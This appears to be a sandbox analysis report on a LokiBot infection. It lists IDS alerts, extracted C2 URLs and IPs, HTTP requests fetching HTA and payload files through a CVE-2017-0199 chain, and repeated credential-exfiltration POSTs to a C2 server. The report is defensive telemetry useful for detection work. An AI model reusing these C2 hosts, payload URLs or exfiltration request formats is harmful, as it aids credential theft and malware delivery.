Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.22:49171 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49195 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49203 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49191
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49192
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49195
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49203 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49203 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49203 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49203 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49203
Source: Network traffic	Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 172.217.16.193:443 -> 192.168.2.22:49169

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor	URLs:

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /35/SMLPERR.txt HTTP/1.1Host: 192.3.176.141Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 192.3.176.141 192.3.176.141
Source: Joe Sandbox View	IP Address: 94.156.177.220 94.156.177.220

Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View	ASN Name: NET1-ASBG NET1-ASBG

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: Network traffic	Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 192.3.176.141:80
Source: Network traffic	Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49166 -> 192.3.176.141:80

Source: global traffic	HTTP traffic detected: GET /ZDFWtO HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: mpa.liConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ZDFWtO HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: mpa.liConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.hta HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.176.141Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.hta HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 192.3.176.141If-Range: "20a11-6252e32d56015"
Source: global traffic	HTTP traffic detected: GET /35/educationalthingswithgreatattitudeonhere.tIF HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.176.141Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close

Source: unknown	HTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.22:49169 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.176.141

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 6_2_000007FE899B4B18 URLDownloadToFileW,

6_2_000007FE899B4B18

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B1AD36F6.emf

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /ZDFWtO HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: mpa.liConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ZDFWtO HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: mpa.liConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.hta HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.176.141Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.hta HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 192.3.176.141If-Range: "20a11-6252e32d56015"
Source: global traffic	HTTP traffic detected: GET /35/educationalthingswithgreatattitudeonhere.tIF HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.176.141Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /35/SMLPERR.txt HTTP/1.1Host: 192.3.176.141Connection: Keep-Alive

Source: mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: mpa.li
Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com

Source: unknown

HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 176Connection: close

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:26 GMTContent-Type: text/html; charset=UTF-8Content-Length: 15Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:29 GMTContent-Type: text/html; charset=UTF-8Content-Length: 15Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:30 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:32 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:33 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:33 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:33 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:36 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:37 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:38 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:40 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:41 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:42 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:43 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:45 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:46 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 24 Oct 2024 19:23:47 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
